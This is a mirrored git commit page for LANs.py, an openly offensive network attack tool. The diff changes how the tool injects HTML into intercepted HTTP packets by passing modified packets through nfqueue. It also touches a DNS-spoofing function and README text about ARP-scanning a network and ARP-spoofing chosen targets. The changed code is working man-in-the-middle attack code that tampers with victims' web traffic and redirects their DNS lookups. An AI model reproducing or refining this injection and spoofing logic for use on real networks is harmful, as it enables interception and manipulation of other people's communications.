mirror of
https://github.com/DanMcInerney/LANs.py.git
synced 2025-07-05 20:42:16 -07:00
minor
This commit is contained in:
parent
2ce543e2f6
commit
89005f41b8
2 changed files with 8 additions and 11 deletions
17
LANs.py
17
LANs.py
|
@ -293,9 +293,9 @@ class Parser():
|
|||
# Recompress data if necessary
|
||||
if 'Content-Encoding: gzip' in headers:
|
||||
if body != '':
|
||||
# debugger = open('/home/user/projects/injectedBody', 'w')
|
||||
# debugger.write(body)
|
||||
# debugger.close()
|
||||
#debugger = open('injectedBody', 'w') #########################################
|
||||
#debugger.write(body) #########################################
|
||||
#debugger.close() #########################################
|
||||
try:
|
||||
comp_body = StringIO()
|
||||
f = gzip.GzipFile(fileobj=comp_body, mode='w', compresslevel = 9)
|
||||
|
@ -308,8 +308,7 @@ class Parser():
|
|||
pkt[IP].len = len(str(pkt))
|
||||
del pkt[IP].chksum
|
||||
del pkt[TCP].chksum
|
||||
payload.set_verdict(nfqueue.NF_DROP)
|
||||
send(pkt)
|
||||
payload.set_verdict_modified(nfqueue.NF_ACCEPT, str(pkt), len(pkt))
|
||||
print '[-] Could not recompress html, sent packet as is'
|
||||
self.html_url = None
|
||||
return
|
||||
|
@ -324,16 +323,15 @@ class Parser():
|
|||
del pkt[IP].chksum
|
||||
del pkt[TCP].chksum
|
||||
try:
|
||||
send(pkt)
|
||||
payload.set_verdict_modified(nfqueue.NF_ACCEPT, str(pkt), len(pkt))
|
||||
print R+'[!] Injected HTML into packet for '+W+self.html_url
|
||||
logger.write('[!] Injected HTML into packet for '+self.html_url)
|
||||
self.block_acks.append(ack)
|
||||
payload.set_verdict(nfqueue.NF_DROP)
|
||||
self.html_url = None
|
||||
except Exception:
|
||||
except Exception as e:
|
||||
payload.set_verdict(nfqueue.NF_ACCEPT)
|
||||
self.html_url = None
|
||||
print '[-] Failed to inject packet'
|
||||
print '[-] Failed to inject packet', e
|
||||
return
|
||||
|
||||
if len(self.block_acks) > 30:
|
||||
|
@ -717,7 +715,6 @@ class Parser():
|
|||
logger.write('[!] Decoded:'+decoded+'\n')
|
||||
|
||||
# Spoof DNS for a specific domain to point to your machine
|
||||
# Make this more reliable by blocking all DNS responses from the server using the IP_src maybe a self.dnsSrc var
|
||||
def dnsspoof(self, dns_layer, IP_src, IP_dst, sport, dport, payload):
|
||||
localIP = [x[4] for x in scapy.all.conf.route.routes if x[2] != '0.0.0.0'][0]
|
||||
if self.args.dnsspoof:
|
||||
|
|
|
@ -28,7 +28,7 @@ Usage
|
|||
python LANs.py
|
||||
```
|
||||
|
||||
Because there's no -ip option this will ARP scan the network, compare it to a live running promiscuous capture, and list all the clients on the network including their Windows netbios names along with how many data packets they're sending. so you can immediately target the active ones. The ability to capture data packets they send is very dependent on physical proximity and the power of your network card. then you can Ctrl-C and pick your target which it will then ARP spoof. Simple target identification and ARP spoofing.
|
||||
Because there's no -ip option this will ARP scan the network, compare it to a live running promiscuous capture, and list all the clients on the network including their Windows netbios names along with how many data packets they're sending so you can immediately target the active ones. The ability to capture data packets they send is very dependent on physical proximity and the power of your network card. then you can Ctrl-C and pick your target which it will then ARP spoof. Simple target identification and ARP spoofing.
|
||||
|
||||
### Passive harvesting:
|
||||
|
||||
|
|
Loading…
Add table
Add a link
Reference in a new issue